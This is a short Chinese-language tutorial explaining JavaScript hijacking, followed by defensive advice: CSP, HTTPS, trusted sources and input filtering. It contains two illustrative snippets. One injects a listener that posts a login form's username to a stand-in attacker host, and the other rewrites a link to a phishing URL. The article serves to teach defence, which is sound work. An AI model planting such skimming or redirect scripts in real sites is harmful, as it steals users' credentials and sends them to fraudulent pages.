Javascript劫持是一种安全威胁形式，指黑客将恶意脚本注入到网站上，从而获取网站的隐私信息或控制网站。这种攻击可以使用多种方式进行，但它们的本质都是通过改变网页的行为来实现。下面我们将看到一些用于演示Javascript劫持的例子。

Javascript劫持的一种常见形式是通过在输入字段中注入脚本来盗取用户信息。下面这个例子通过一个简单的登录表单来演示这种攻击：

<form name="login-form" method="post" action="http://example.com/login"><label>Username:</label><input type="text" name="username" value=""><label>Password:</label><input type="password" name="password" value=""><button type="submit">Login</button></form><script>document.querySelector('input[name="username"]').addEventListener('change', function() {var xhr = new XMLHttpRequest();xhr.open('POST', 'http://attacker.com/steal', true);xhr.send('username=' + this.value);});</script>

在这个例子中，我们将一个事件监听器绑定到用户名输入框上。当用户输入用户名时，脚本会立即发送一个POST请求到攻击者的服务器上，这个请求中包含了用户输入的用户名。如果攻击者成功将恶意脚本嵌入到网站中，那么他就可以从服务器上获取到用户的登录信息。

另一种Javascript劫持的形式是通过修改链接或网站中的按钮来篡改网站的行为。以下是一个演示这种攻击的例子：

<a href="http://example.com/account">My Account</a><script>document.querySelector('a').href = 'http://attacker.com/phishing';</script>

在这个例子中，我们将“我的账户”链接的目标URL修改为攻击者的伪造网站。如果用户单击这个链接，他们将被重定向到攻击者的网站上，而不是到真正的账户页面上。

Javascript劫持是一种十分严重的安全问题，因此开发者需要采取必要的措施来保护他们的网站不受此攻击。下面是一些可行的防范措施：

• 使用内容安全策略 (CSP) 限制可以执行的脚本代码。
• 使用HTTPS加密通信，以免脚本被中间人篡改。
• 仅信任已验证的源来提供脚本代码。
• 使用安全的编码实践，如过滤用户输入和编写规范的代码。

总之，Javascript劫持是一种十分严重的安全问题，可以极大地危害到用户和开发者的利益。我们应该采取必要的防范措施来保护我们的网站和用户不受到此攻击。